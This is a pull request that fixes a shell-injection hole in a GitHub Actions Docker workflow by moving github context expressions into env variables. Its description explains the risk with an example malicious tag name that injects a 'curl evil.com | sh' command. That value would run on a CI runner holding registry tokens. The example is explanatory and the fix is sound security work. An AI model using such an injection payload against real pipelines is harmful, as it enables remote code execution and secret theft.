### PR TITLE
fix(ci): close shell-injection vector in docker-combined workflow

### DIFF
--- a/.github/workflows/docker-combined.yml
+++ b/.github/workflows/docker-combined.yml
@@ -86,17 +86,21 @@ jobs:
 
       - name: Extract version metadata
         id: version
+        env:
+          REF_TYPE: ${{ github.ref_type }}
+          REF_NAME: ${{ github.ref_name }}
+          GH_SHA: ${{ github.sha }}
         run: |
           # Extract version from tag (strip 'v' prefix) or use 'dev' for manual runs
-          if [[ "${{ github.ref_type }}" == "tag" ]]; then
-            VERSION="${{ github.ref_name }}"
+          if [[ "$REF_TYPE" == "tag" ]]; then
+            VERSION="$REF_NAME"
             VERSION="${VERSION#v}"  # Remove 'v' prefix
           else
             VERSION="dev"
           fi
-          echo "version=${VERSION}" >> $GITHUB_OUTPUT
-          echo "commit_sha=${{ github.sha }}" >> $GITHUB_OUTPUT
-          echo "build_date=$(date -u +%Y-%m-%dT%H:%M:%SZ)" >> $GITHUB_OUTPUT
+          echo "version=${VERSION}" >> "$GITHUB_OUTPUT"
+          echo "commit_sha=${GH_SHA}" >> "$GITHUB_OUTPUT"
+          echo "build_date=$(date -u +%Y-%m-%dT%H:%M:%SZ)" >> "$GITHUB_OUTPUT"
 
       - name: Verify commit SHA is available
         run: |
@@ -221,12 +225,13 @@ jobs:
         id: scan-tag
         env:
           REF_NAME: ${{ github.ref_name }}
+          REF_TYPE: ${{ github.ref_type }}
         run: |
           # Use exact version tag (strip 'v' prefix) for tag pushes, 'latest' for manual runs
-          if [[ "${{ github.ref_type }}" == "tag" ]]; then
-            echo "tag=${REF_NAME#v}" >> $GITHUB_OUTPUT
+          if [[ "$REF_TYPE" == "tag" ]]; then
+            echo "tag=${REF_NAME#v}" >> "$GITHUB_OUTPUT"
           else
-            echo "tag=latest" >> $GITHUB_OUTPUT
+            echo "tag=latest" >> "$GITHUB_OUTPUT"
           fi
 
       - name: Run Trivy vulnerability scanner


### PR DESCRIPTION
## Summary

Closes the Semgrep code-scanning alert (`yaml.github-actions.security.run-shell-injection.run-shell-injection`) on `.github/workflows/docker-combined.yml:89` by moving all `${{ github.* }}` context references out of `run:` blocks and into `env:` blocks, then reading them via bash variables which respect normal shell quoting.

## What was vulnerable

```yaml
run: |
  if [[ "${{ github.ref_type }}" == "tag" ]]; then
    VERSION="${{ github.ref_name }}"
```

`github.ref_name` is the tag/branch name. A maliciously crafted tag like `v1.0.0"; rtk curl evil.com | sh; #` would be expanded into the script *before* bash sees it, executing arbitrary code on the runner — which has access to:

- `secrets.DOCKERHUB_TOKEN`
- `secrets.GITHUB_TOKEN` (with `packages: write`)
- The build context

## What was changed

Two `run:` steps refactored to use the `env:`-block pattern:

1. **`Extract version metadata`** (the Semgrep-flagged step) — moved `github.ref_type`, `github.ref_name`, `github.sha` into env vars `REF_TYPE`, `REF_NAME`, `GH_SHA`
2. **`Determine scan tag`** — `REF_NAME` was already env-ized; added `REF_TYPE` to match (was still inline at line 226)

Also quoted `"$GITHUB_OUTPUT"` per shellcheck best practice while in the area.

## Why this matters even though tag creation is admin-gated

Defense-in-depth. Today we trust admin-only tag creation. Tomorrow:
- A new automation might push tags from a workflow
- A contributor might get push rights
- An admin's PAT might be compromised

The env-var pattern eliminates the vulnerability class regardless of who controls the ref name.

## Out of scope

`steps.version.outputs.commit_sha` (lines 103-107) and `steps.meta.outputs.tags` (lines 187-196) also appear in `run:` blocks but are not flagged. They come from our own derived job outputs (controlled trust chain) and Semgrep specifically targets the `github.*` context for this rule. Aesthetic-only refactor — left alone to keep this PR scoped to the actual security fix.

## Test plan

- [x] YAML syntax valid (`python3 -c "import yaml; yaml.safe_load(...)"`)
- [ ] CI green (lint + smoke + docker build)
- [ ] Semgrep alert closes on next scan after merge

🤖 Generated with [Claude Code](https://claude.com/claude-code)